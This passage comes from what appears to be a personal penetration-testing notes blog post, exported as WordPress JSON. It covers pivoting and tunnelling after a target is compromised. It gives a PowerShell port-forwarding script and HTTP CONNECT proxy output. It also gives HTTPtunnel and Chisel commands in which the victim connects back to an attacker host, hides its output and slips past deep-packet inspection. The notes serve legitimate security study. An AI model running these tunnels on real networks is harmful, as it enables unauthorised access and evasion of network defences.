data-enlighter-lineoffset data-enlighter-title data-enlighter-group># Define the local listener and the remote endpoint\n$localPort = 5555\n$remoteHost = \"10.10.10.4\"\n$remotePort = 4444\n\n# Create a TCP listener on the local machine\n$listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any, $localPort)\n$listener.Start()\nWrite-Host \"Listening on port $localPort...\"\n\nwhile ($true) {\n    # Accept incoming client connection\n    $client = $listener.AcceptTcpClient()\n    $clientStream = $client.GetStream()\n    Write-Host \"Client connected.\"\n\n    # Connect to the remote server\n    $remoteClient = New-Object System.Net.Sockets.TcpClient\n    $remoteClient.Connect($remoteHost, $remotePort)\n    $remoteStream = $remoteClient.GetStream()\n    Write-Host \"Connected to remote $remoteHost:$remotePort.\"\n\n    # Create buffers for data transmission\n    $buffer = New-Object byte[] 1024\n\n    # Forward data from the local client to the remote server\n    Start-Job {\n        while ($clientStream.DataAvailable) {\n            $readBytes = $clientStream.Read($buffer, 0, $buffer.Length)\n            $remoteStream.Write($buffer, 0, $readBytes)\n        }\n    }\n\n    # Forward data from the remote server back to the local client\n    Start-Job {\n        while ($remoteStream.DataAvailable) {\n            $readBytes = $remoteStream.Read($buffer, 0, $buffer.Length)\n            $clientStream.Write($buffer, 0, $readBytes)\n        }\n    }\n}\n<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">With ncat<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Upload ncat.exe from p61-win\u00addows-bina\u00adries and see&nbsp;above.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">HTTP<\/span> <span class=\"caps\">CONNECT<\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">HTTP<\/span> con\u00adnect can for\u00adward requests:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"># nc -vvn 192.168.1.130 8888 (UNKNOWN) [192.168.1.130] 8888 (?) open\nCONNECT 10.11.1.203:80 HTTP\/1.0\n\nHTTP\/1.0 200 Connection established\nProxy-agent: tinyproxy\/1.8.3\n\nHEAD \/ HTTP\/1.0\n\nHTTP\/1.1 200 OK\nServer: Microsoft-IIS\/5.1<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">HTTPtunnel<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Assume, you want to access a <span class=\"caps\">SSH<\/span> serv\u00ader on $vic\u00adtim via <span class=\"caps\">HTTP<\/span>. On the attack\u00ader (plays the serv\u00ader role), for\u00adward incom\u00ading traf\u00adfic to 8080 to localhost:22.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hts -F localhost:22 8080<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">On the vic\u00adtim sys\u00adtem, con\u00adnect to the attack\u00ader via port 80 and open local port&nbsp;3333.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">htc -F 3333 $attacker_ip:8080<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now, on the vic\u00adtim, a <span class=\"caps\">SSH<\/span> tun\u00adnel can be build back to the attack\u00ader&nbsp;via<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -p3333 localhost<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">PWnat<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/tools.kali.org\/maintaining-access\/pwnat\">https:\/\/tools.kali.org\/maintaining-access\/pwnat<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">HTTP<\/span> tunneling with Chisel<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/jpillora\/chisel\">Chis\u00adel<\/a> can tun\u00adnel <span class=\"caps\">SSH<\/span> data via <span class=\"caps\">HTTP<\/span> to evade deep-packed inspec\u00adtion filters.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Pro\u00advide chis\u00adel for the prop\u00ader archi\u00adtec\u00adture on&nbsp;<span class=\"caps\">HTTP<\/span>.<\/li>\n\n\n\n<li>Upload the bina\u00adry on the tar\u00adget, e.g. into <code>\/tmp\/chisel<\/code><\/li>\n\n\n\n<li>Start the serv\u00ader on your own sys\u00adtem<br><code>chisel server --port 8080 --reverse<\/code><\/li>\n\n\n\n<li>Start the client on the tar\u00adget<br><code>\/tmp\/chisel client $ownIp:8080 R:socks &gt; \/dev\/null 2&gt;&amp;1 &amp;<\/code><br><em>If some\u00adthing does not work, make sure to have the same ver\u00adsion on both ends. And, try to get out\u00adput local\u00adly, <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2847\" data-type=\"post\" data-id=\"2847\">see maybe the if then page<\/a> for redi\u00adrect\u00ading <span class=\"caps\">STDERR<\/span> and <span class=\"caps\">STDOUT<\/span> to a local net\u00adcat listener.<\/em><\/li>\n\n\n\n<li>Use now :1080 als <span class=\"caps\">SOCKS<\/span> proxy port on your sys\u00adtem.<br>Some <\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Socat If Socat is not on the tar\u00adget sys\u00adtem, upload a sta\u00adt\u00adic bina\u00adry. This will lis\u00adten to port 5555 and for\u00adward it to the giv\u00aden <span class=\"caps\">IP<\/span> on the giv\u00aden port deep\u00ader in the tar\u00adget\u2019s net\u00adwork: socat \u2011ddd <span class=\"caps\">TCP-LISTEN<\/span>:5555,reuseaddr,fork <span class=\"caps\">TCP<\/span>:10.4.247.215:5432 Prox\u00ady\u00adchains ! If prox\u00ady\u00adchains is slow, espe\u00adcial\u00adly while port scan\u00adning, try to reduce the fol\u00adlow\u00ading parameters:&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[468],"tags":[48,393],"class_list":["post-3109","post","type-post","status-publish","format-standard","hentry","category-general","tag-forwarding","tag-tunnel"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/3109","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3109"}],"version-history":[{"count":32,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/3109\/revisions"}],"predecessor-version":[{"id":4959,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/3109\/revisions\/4959"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3109"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3109"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3109"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}